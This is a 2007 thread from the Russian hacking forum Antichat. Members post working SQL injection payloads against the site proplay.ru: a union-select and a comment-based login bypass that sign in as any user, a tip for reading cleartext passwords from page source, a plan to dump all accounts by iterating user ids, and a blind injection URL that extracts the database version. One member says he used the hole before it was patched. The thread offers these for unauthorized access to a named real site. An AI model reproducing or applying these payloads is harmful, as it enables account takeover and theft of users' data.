ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Уязвимость на proplay.ru
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость на proplay.ru
  #1  
Старый 04.06.2007, 16:13
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию Уязвимость на proplay.ru
Посодействовал l1ght, за что ему большое спасибо. Суть баги в том, что можно залогиниться под любым аккаунтом следующим способом:

Логин: -1
Пароль: ' union select id,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll/*

Где id - id юзера.
 
Ответить с цитированием

  #2  
Старый 04.06.2007, 16:37
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию
Как уже сказал гема хватает просто:
user'/*
asd

И ещё, если хотите узнать пароль - зайдите в /users/settings/ там будет пароль за звёздочками, открывайте сорцы страницы - там будет пароль в чистом виде...
 
Ответить с цитированием

  #3  
Старый 04.06.2007, 16:52
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию
Первый метод подойдет, скажем, для создания БД всех юзеров (путем перебора id).
 
Ответить с цитированием

  #4  
Старый 05.06.2007, 17:25
Аватар для loc
loc
Новичок
Регистрация: 01.06.2007
Сообщений: 7
Провел на форуме:
82944

Репутация: 0
Отправить сообщение для loc с помощью ICQ
Exclamation
Эх.... жаль перекрыли уже ) Но я успел поюзать .... Респект авторам!!!
Последний раз редактировалось loc; 05.06.2007 в 17:32..
 
Ответить с цитированием

  #5  
Старый 07.06.2007, 15:24
Аватар для BlasT
BlasT
Новичок
Регистрация: 23.08.2005
Сообщений: 6
Провел на форуме:
481432

Репутация: 0
По умолчанию
http://www.proplay.ru/forums/cs/7909'/
есть еще одна sql токо не как немогу подобрать правильное кол-во полей кто поможет?
 
Ответить с цитированием

  #6  
Старый 09.06.2007, 11:45
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию
Как подбираешь? Это не скуля, а просто бажок в скрипте, в частности, в инклудинге. Ничего там не поимеешь

З.Ы. Хотя сорри, затупил. Теперь вижу...
Последний раз редактировалось Joker-jar; 09.06.2007 в 11:49.. Причина: гыыы
 
Ответить с цитированием

  #7  
Старый 09.06.2007, 12:03
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию
На счет union точно не знаю. Посимвольный перебор:
Код:
http://www.proplay.ru/forums/q3'+and+ascii(lower(substring(version(),1,1)))=0x35+and+'1'='1/
MySQL 5.x
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Os - моя крепость Elekt Избранное 32 06.08.2009 15:10
На Windows «налипла» уязвимость DJ.KilleR Мировые новости 10 15.03.2007 02:21
Подборка уязвимостей phpBB -=ka$at1k=- Форумы 3 02.07.2006 15:26
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Форумы 2 24.12.2005 17:28
Уязвимость в iChat'е. -SX- Болталка 0 15.01.2005 23:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ